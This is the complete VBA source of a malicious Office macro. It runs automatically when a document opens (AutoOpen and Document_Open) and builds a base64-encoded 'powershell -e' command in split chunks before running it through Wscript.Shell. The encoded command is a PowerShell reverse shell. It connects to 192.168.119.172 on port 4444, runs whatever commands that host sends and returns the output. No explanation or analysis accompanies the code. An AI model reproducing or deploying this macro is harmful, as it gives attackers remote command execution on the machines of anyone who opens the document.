Sub AutoOpen()
    Mymacro
End Sub
Sub Document_Open()
    Mymacro
End Sub
Sub Mymacro()
    Dim Str As String
    Str = str + "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAt"
    Str = str + "AE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAF"
    Str = str + "MAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIA"
    Str = str + "MQA5ADIALgAxADYAOAAuADEAMQA5AC4AMQA3ADIAIgAsADQANA"
    Str = str + "A0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBl"
    Str = str + "AG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AH"
    Str = str + "QAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUA"
    Str = str + "NQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIA"
    Str = str + "A9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0"
    Str = str + "AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAH"
    Str = str + "QAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAA"
    Str = str + "PQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQ"
    Str = str + "BOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBT"
    Str = str + "AEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AH"
    Str = str + "IAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsA"
    Str = str + "JABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZA"
    Str = str + "BhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBp"
    Str = str + "AG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgAC"
    Str = str + "QAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsA"
    Str = str + "IAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOw"
    Str = str + "AkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAu"
    Str = str + "AGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAE"
    Str = str + "cAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIA"
    Str = str + "KQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQ"
    Str = str + "BuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAu"
    Str = str + "AEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAH"
    Str = str + "UAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMA"
    Str = str + "ZQAoACkA"
    CreateObject("Wscript.Shell").Run Str
End Sub
